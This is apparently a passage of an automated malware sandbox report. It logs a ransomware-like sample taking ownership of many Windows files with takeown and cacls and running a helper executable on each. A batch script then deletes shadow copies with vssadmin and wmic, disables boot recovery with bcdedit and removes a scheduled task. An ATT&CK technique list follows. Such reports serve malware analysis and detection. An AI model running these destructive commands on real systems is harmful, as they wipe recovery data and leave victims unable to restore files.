    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1""
  2⤵
  PID:712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:3740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1"
    3⤵
    - Modifies file permissions
    PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "settings.dat.LOG1" -nobanner
    3⤵
    PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "settings.dat.LOG1" -nobanner
      4⤵
      PID:1596
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3380
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:2424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1328
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:3860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1280
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2984
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Network\Downloader\edb.log""
  2⤵
  PID:3464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\edb.log" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\edb.log"
    3⤵
    PID:3740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "edb.log" -nobanner
    3⤵
    PID:3884
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "edb.log" -nobanner
      4⤵
      PID:3648
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  2⤵
  PID:3380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
    3⤵
    - Modifies file permissions
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    3⤵
    PID:3352
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftNotepad.xml" -nobanner
      4⤵
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  2⤵
  PID:648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    3⤵
    PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  2⤵
  PID:3344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "NetworkPrinters.xml" -nobanner
    3⤵
    PID:3924
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "NetworkPrinters.xml" -nobanner
      4⤵
      PID:272
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:64
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1""
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1"
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "75fbd12bafcbd46e_COM15.dat.LOG1" -nobanner
    3⤵
    PID:844
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "75fbd12bafcbd46e_COM15.dat.LOG1" -nobanner
      4⤵
      PID:3892
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl""
  2⤵
  PID:2120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" /E /G Admin:F /C
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl"
    3⤵
    - Modifies file permissions
    PID:3888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
    3⤵
    PID:880
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
      4⤵
      PID:1104
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    - Modifies file permissions
    PID:3996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:3648
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:272
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2588
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3604
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3320
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1260
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3760
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""
  2⤵
  PID:2160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C
    3⤵
    PID:3740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"
    3⤵
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "StorageHealthModel.dat" -nobanner
    3⤵
    PID:2960
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "StorageHealthModel.dat" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""
  2⤵
  PID:1256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
    3⤵
    PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner
      4⤵
      PID:3604
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""
  2⤵
  PID:3432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
    3⤵
    PID:736
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner
      4⤵
      PID:3760
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""
  2⤵
  PID:2308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"
    3⤵
    PID:3996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "ThemeSettings2013.xml" -nobanner
    3⤵
    PID:272
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "ThemeSettings2013.xml" -nobanner
      4⤵
      PID:2484
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl""
  2⤵
  PID:1320
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl"
    3⤵
    - Modifies file permissions
    PID:2428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
    3⤵
    PID:3032
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "UpdateSessionOrchestration.c0420e39-c8db-4b54-90c3-080a89e51afd.1.etl" -nobanner
      4⤵
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:3012
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:3632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Modifies file permissions
    PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:2164
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:272
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "background.png" -nobanner
    3⤵
    PID:2084
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "background.png" -nobanner
      4⤵
      PID:2116
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:3464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1280
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:736
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:3588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:3740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3884
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
  2⤵
  PID:3168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    3⤵
    PID:3864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    3⤵
    PID:2668
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
      4⤵
      PID:712
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3352

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\rbrsCstX.bat"
1⤵
PID:1016
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:1756
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3588
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1592
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2864
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:2648

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

